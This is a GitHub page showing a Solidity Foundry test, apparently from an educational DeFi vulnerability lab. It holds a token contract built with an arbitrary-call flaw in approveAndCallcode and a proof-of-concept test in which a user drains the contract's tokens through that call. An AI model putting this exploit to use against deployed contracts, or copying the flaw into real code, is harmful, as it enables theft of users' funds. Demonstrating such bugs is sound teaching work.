DeFiVulnLabs/src/test/UnsafeCall.sol at main · akioniace/DeFiVulnLabs

History

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.15;

import "forge-std/Test.sol";

contract ContractTest is Test {

TokenWhale TokenWhaleContract;

function testUnsafeCall() public {

address alice = vm.addr(1);

TokenWhaleContract = new TokenWhale();

TokenWhaleContract.TokenWhaleDeploy(address(TokenWhaleContract));

console.log("TokenWhale balance:", TokenWhaleContract.balanceOf(address(TokenWhaleContract)));

// bytes memory payload = abi.encodeWithSignature("transfer(address,uint256)",address(alice),1000);

console.log("Alice tries to perform unsafe call to transfer asset from TokenWhaleContract");

vm.prank(alice);

TokenWhaleContract.approveAndCallcode(

address(TokenWhaleContract), 0, abi.encodeWithSignature("transfer(address,uint256)", address(alice), 1000)

);

console.log("Exploit completed");

console.log("TokenWhale balance:", TokenWhaleContract.balanceOf(address(TokenWhaleContract)));

console.log("Alice balance:", TokenWhaleContract.balanceOf(address(alice)));

}

receive() external payable {}

}

contract TokenWhale {

address player;

uint256 public totalSupply;

mapping(address => uint256) public balanceOf;

mapping(address => mapping(address => uint256)) public allowance;

string public name = "Simple ERC20 Token";

string public symbol = "SET";

uint8 public decimals = 18;

function TokenWhaleDeploy(address _player) public {

player = _player;

totalSupply = 1000;

balanceOf[player] = 1000;

}

function isComplete() public view returns (bool) {

return balanceOf[player] >= 1000000; // 1 mil

}

event Transfer(address indexed from, address indexed to, uint256 value);

function _transfer(address to, uint256 value) internal {

balanceOf[msg.sender] -= value;

balanceOf[to] += value;

emit Transfer(msg.sender, to, value);

}

function transfer(address to, uint256 value) public {

require(balanceOf[msg.sender] >= value);

require(balanceOf[to] + value >= balanceOf[to]);

_transfer(to, value);

}

event Approval(address indexed owner, address indexed spender, uint256 value);

function approve(address spender, uint256 value) public {

allowance[msg.sender][spender] = value;

emit Approval(msg.sender, spender, value);

}

function transferFrom(address from, address to, uint256 value) public {

require(balanceOf[from] >= value);

require(balanceOf[to] + value >= balanceOf[to]);

require(allowance[from][msg.sender] >= value);

allowance[from][msg.sender] -= value;

_transfer(to, value);

}

/* Approves and then calls the contract code*/

function approveAndCallcode(address _spender, uint256 _value, bytes memory _extraData)

public

returns (bool success)

{

allowance[msg.sender][_spender] = _value;

//Call the contract code

_spender.call(_extraData); //vulnerable point

// return true;

}

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

UnsafeCall.sol

UnsafeCall.sol

Files

UnsafeCall.sol

Latest commit

History

UnsafeCall.sol

File metadata and controls